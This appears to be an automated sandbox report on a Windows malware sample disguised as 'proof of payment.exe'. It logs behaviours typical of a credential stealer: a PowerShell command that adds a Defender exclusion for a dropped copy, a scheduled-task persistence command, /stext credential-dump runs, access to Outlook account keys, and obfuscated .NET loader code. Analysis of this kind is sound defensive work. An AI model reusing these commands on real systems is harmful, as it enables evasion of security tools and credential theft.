                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx"
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\uevjjogtpiaq"Jump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\eyacchqudqsuyhp"Jump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\eyacchqudqsuyhp"Jump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx"Jump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx"Jump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpE166.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess created: C:\Users\user\AppData\Roaming\NvbYSEq.exe "C:\Users\user\AppData\Roaming\NvbYSEq.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: pstorec.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: wldp.dll
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: pstorec.dll
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: wldp.dll
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\proof of payment.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\proof of payment.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeFile opened: C:\Users\user\Desktop\proof of payment.cfgJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\proof of payment.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: proof of payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: proof of payment.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 0.2.proof of payment.exe.5130000.6.raw.unpack, XG.cs.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                    .NET source code contains potential unpacker
                    Source: proof of payment.exe, InfoForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                    Source: NvbYSEq.exe.0.dr, InfoForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                    Source: 0.2.proof of payment.exe.2683120.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, pr8Do41Q1tqFwxoK05.cs.Net Code: YYmj2I0glM System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.proof of payment.exe.4f00000.4.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, pr8Do41Q1tqFwxoK05.cs.Net Code: YYmj2I0glM System.Reflection.Assembly.Load(byte[])
                    Source: 8.2.NvbYSEq.exe.25c3108.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041CB50
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 7_2_10002806 push ecx; ret 7_2_10002819
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 8_2_0686984A push E9906C8Fh; ret 8_2_0686985C
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 8_2_0686C992 push E8FFFFFFh; iretd 8_2_0686C99D
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00457106 push ecx; ret 12_2_00457119
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0045B11A push esp; ret 12_2_0045B141
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0045E54D push esi; ret 12_2_0045E556
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00457A28 push eax; ret 12_2_00457A46
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00434E56 push ecx; ret 12_2_00434E69
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_0044693D push ecx; ret 15_2_0044694D
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_0044DB70 push eax; ret 15_2_0044DB84
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_0044DB70 push eax; ret 15_2_0044DBAC
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_00451D54 push eax; ret 15_2_00451D61
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_0044B090 push eax; ret 17_2_0044B0A4
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_0044B090 push eax; ret 17_2_0044B0CC
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_00451D34 push eax; ret 17_2_00451D41
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_00444E71 push ecx; ret 17_2_00444E81
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 20_2_00414060 push eax; ret 20_2_00414074
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 20_2_00414060 push eax; ret 20_2_0041409C
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 20_2_00414039 push ecx; ret 20_2_00414049
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 20_2_004164EB push 0000006Ah; retf 20_2_004165C4
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 20_2_00416553 push 0000006Ah; retf 20_2_004165C4
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 20_2_00416555 push 0000006Ah; retf 20_2_004165C4
                    Source: proof of payment.exeStatic PE information: section name: .text entropy: 7.988023924339669
                    Source: NvbYSEq.exe.0.drStatic PE information: section name: .text entropy: 7.988023924339669
                    Source: 0.2.proof of payment.exe.5130000.6.raw.unpack, XG.csHigh entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, O04JbMpW67PNEoiq0y.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'LFnreChvBM', 'qc9rFHbpxX', 'EFMrz9uWvg', 'BcUT8VKtCk', 'pNaT7QbYeb', 'gELTr0RMka', 'nonTTNEExw', 'JKqTCRtT02uAYJPq4DQ'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, KgSR3u8nGBA1sLZNNP.csHigh entropy of concatenated method names: 'P3kSxguUdE', 'rrfS3P41Lg', 'HtWVcnAS2h', 'vruVqTjcr6', 'juvVmxsd82', 'EVcVw6TC5x', 'b4gVdPOK25', 'olRV59jdO9', 'U3cV1JFlpf', 'fj9Vl0ddoF'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, woM7QtlW1bUYg1UktQ.csHigh entropy of concatenated method names: 'Dispose', 'Igf7eh15cC', 'dHLrtBkvqb', 'hvSii582gn', 'iui7Fc4kqI', 'nXH7z6UCLr', 'ProcessDialogKey', 'cfhr86d3tt', 'HFwr7YmbAM', 'xunrrPcb5R'
